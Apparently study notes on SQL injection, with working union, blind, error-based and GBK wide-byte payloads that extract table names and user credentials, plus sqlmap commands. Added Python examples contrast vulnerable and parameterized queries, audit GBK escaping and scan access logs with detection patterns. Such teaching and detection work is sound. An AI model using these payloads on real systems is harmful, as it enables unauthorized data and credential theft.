SQL injection: the server takes user-supplied data and executes it as SQL code.
Prerequisites
The information_schema database has a tables table whose columns TABLE_SCHEMA (the name of every database) and TABLE_NAME (the name of every table) list the schema.
The information_schema.columns table has TABLE_SCHEMA, TABLE_NAME (the table) and COLUMN_NAME (the column).
select 1,table_name from information_schema.tables where table_schema = database();
select 1,column_name from information_schema.columns where table_schema = database() and table_name = 'flag';
Echoed output (the query result is displayed in the response)
Union-based injection
?id=1' order by 3 --+
?id=-1' union select 1,2,3--+
?id=-1' union select 1,database(),version()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,id,password) from users--+
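The server-side bug behind the union payloads above, shown as an added example that is not part of these notes: a lookup that concatenates the id parameter into the SQL string, next to the parameterized form that the same application should use. It assumes an in-memory SQLite table as a stand-in for the three-column users table (MySQL-only functions such as database() are therefore not used); the payload is the URL-decoded form of ?id=-1' union select 1,2,3--+ and is constructed input.

```python
import sqlite3

# Constructed stand-in for the three-column users table the payloads read from
# (assumption: SQLite in memory instead of MySQL; the injection mechanics are the
# same because the defect is string concatenation, not the database engine).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany("insert into users values (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn


def lookup_vulnerable(conn, user_id):
    # The raw parameter is pasted into the SQL text. A quote in the input closes
    # the literal, 'union select' appends a second result set, and '-- ' comments
    # out the trailing 'limit 1'. This is the pattern the union payloads rely on.
    sql = f"select id, username, password from users where id='{user_id}' limit 1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    # The value travels separately from the statement, so the driver treats the
    # whole string (quote, union and all) as a single literal compared with id.
    sql = "select id, username, password from users where id=? limit 1"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    conn = make_db()
    benign = "1"
    payload = "-1' union select 1,2,3-- "   # constructed: decoded -1'+union+select+1,2,3--+
    return {
        "benign_vulnerable": lookup_vulnerable(conn, benign),
        "benign_safe": lookup_parameterized(conn, benign),
        "payload_vulnerable": lookup_vulnerable(conn, payload),   # [(1, 2, 3)]
        "payload_safe": lookup_parameterized(conn, payload),      # []
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the benign id both functions return the same row; with the payload the concatenated query returns the attacker-chosen row (1, 2, 3), while the parameterized query returns nothing because no id equals that string. Fixing the concatenation is the mitigation for every payload family in these notes, since each of them starts by closing the quoted literal.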
Blind injection steps
Boolean-based blind
id=1' and length(database())=8--+   determines the length of the database name from whether the page errors
id=1' and substr(database(),1,1)='s'--+   checks from the error whether the first character of the name is 's'; this form can only test with =
id=1' and ascii(substr(database(),1,1))>100--+   testing one character at a time is too slow, so use the ascii function and compare with >
id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 --+   finds the length of the returned field (the table name) from whether the page errors
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>1--+   finds the field character by character
Time-based blind
id=1' and if(length(database())>1,0,sleep(3)) --+   tests whether the database name length is greater than 1: if so the expression returns 0, otherwise it sleeps for 3 seconds
id=1' and if(ascii(substr(database(),1,1))>1,0,sleep(3)) --+
id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>1,0,sleep(3)) --+
Error-based injection
The updatexml function: updatexml(target XML document, XPath expression for the node to update, replacement content)
1. or updatexml(1,concat(0x7e,(select database()),0x7e),1)   a subquery is placed in the XPath argument; the special characters we add make the string an invalid XPath expression, so MySQL raises an error that contains it
The subquery is executed first; 0x7e is hexadecimal for the ~ character
2. or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1),0x7e),1)
3. or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='xx' limit 0,1),0x7e),1)
Wide-byte injection (the connection character set must be GBK)
1. ?id=-1%df%5c' order by 3 --+
2. ?id=-1%df%5c' union select 1,2,3--+
3. ?id=-1%df%5c' union select 1,database(),2 --+
4. ?id=-1%df%5c' union select 1,table_name from information_schema.tables where table_schema=database() limit 3,1 --+
5. ?id=-1%df%5c' union select 1,column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 1,2 --+
6. ?id=-1%df%5c' union select 1,username,password from users --+
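Why the GBK requirement matters, as an added example that is not part of these notes: byte-oriented quote escaping in the style of PHP's addslashes() inserts a backslash (0x5c) before the quote, and under GBK a preceding lead byte such as 0xdf absorbs that 0x5c as its trail byte, which is how the %df%5c' sequence above comes to contain a live quote. The check below escapes a constructed input on bytes, decodes the result under a given character set the way the database would, and reports whether an unescaped quote remains. The escaper and the probe bytes are assumptions for the demonstration, not the page's code.

```python
# Constructed demonstration of charset-unaware escaping versus a multibyte charset.

def escape_quotes(raw: bytes) -> bytes:
    # Escaping that works on bytes and knows nothing about multibyte characters
    # (assumed stand-in for addslashes()-style escaping).
    return raw.replace(b"'", b"\\'")


def has_unescaped_quote(text: str) -> bool:
    # A quote not preceded by a backslash would terminate a SQL string literal.
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def quote_survives_escaping(raw: bytes, charset: str) -> bool:
    # Escape on bytes, then decode as the database would with this connection charset.
    # Under GBK, b"\xdf" + b"\\" form one two-byte character, so the quote is exposed.
    escaped = escape_quotes(raw)
    decoded = escaped.decode(charset, errors="replace")
    return has_unescaped_quote(decoded)


def audit(raw: bytes) -> dict:
    # Compare the same escaped bytes under GBK and UTF-8.
    return {cs: quote_survives_escaping(raw, cs) for cs in ("gbk", "utf-8")}


if __name__ == "__main__":
    probe = b"\xdf'"          # constructed: the %df prefix followed by a quote
    print(audit(probe))       # {'gbk': True, 'utf-8': False}
    print(audit(b"plain'"))   # {'gbk': False, 'utf-8': False}
```

The escaped bytes for the probe are 0xdf 0x5c 0x27; decoded as GBK they become one CJK character followed by a bare quote, decoded as UTF-8 the 0xdf becomes a replacement character and the quote stays escaped. The mitigation is not a better escaper: configure the connection character set through the driver so escaping is charset-aware, or, better, send values as query parameters so no escaping is involved at all.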
Bypassing WAFs with inline comments
Running sqlmap against a GET request
python sqlmap.py -u url --batch
Against a POST request
python sqlmap.py -u url --forms --batch
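A detection view of the union, boolean-blind, time-blind, error-based and wide-byte payloads in these notes, as an added example that is not part of the original: the scanner URL-decodes the request path from access-log lines and tags each payload family by the MySQL functions and keywords the payloads use. The log lines are constructed, the /item?id= endpoint is an assumption, and the wide-byte rule (a GBK lead byte directly followed by a quote or backslash) is a heuristic that can also fire on legitimate GBK text, so treat its hits as a triage signal.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache-style access-log lines: one benign request and one request
# per payload family from these notes. Not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /item?id=-1%27+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=%27security%27--+ HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /item?id=1%27+and+ascii(substr(database(),1,1))%3E100--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /item?id=1%27+and+if(length(database())%3E1,0,sleep(3))--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:07 +0000] "GET /item?id=1%27+or+updatexml(1,concat(0x7e,(select+database()),0x7e),1)--+ HTTP/1.1" 500 301',
    '10.0.0.5 - - [01/Jan/2024:12:00:08 +0000] "GET /item?id=-1%df%5c%27+union+select+1,2,3--+ HTTP/1.1" 200 640',
]

# Payload families from these notes, as regexes over the URL-decoded query text.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "boolean_blind": re.compile(r"\b(?:and|or)\s+(?:ascii|length|substr)\s*\(", re.I),
    "time_blind": re.compile(r"\bsleep\s*\(", re.I),
    "error_based": re.compile(r"\bupdatexml\s*\(", re.I),
}
# Heuristic: a GBK lead byte (0x81-0xFE) immediately followed by a quote or
# backslash, the byte shape a wide-byte payload has after URL decoding.
WIDE_BYTE = re.compile(rb"[\x81-\xfe][\x27\x5c]")

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_request(path: str) -> bytes:
    # Form-style decoding: '+' is a space, %xx sequences become raw bytes.
    return unquote_to_bytes(path.replace("+", " "))


def classify(path: str) -> list:
    raw = decode_request(path)
    text = raw.decode("latin-1")   # lossless 1:1 mapping keeps high bytes visible
    tags = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    if WIDE_BYTE.search(raw):
        tags.append("wide_byte")
    return sorted(tags)


def scan(lines):
    # Returns (request path, tags) for every line that matches at least one family.
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        tags = classify(m.group(1))
        if tags:
            hits.append((m.group(1), tags))
    return hits


if __name__ == "__main__":
    for path, tags in scan(SAMPLE_LOG):
        print(", ".join(tags), "<-", path)
```

Decoding before matching is the important step: the payloads reach the log percent-encoded, with + for spaces and %27 for the quote, so a pattern applied to the raw line misses them. The time-based family is also visible without any pattern, as a response delay of several seconds on an otherwise cheap endpoint, which is worth alerting on independently.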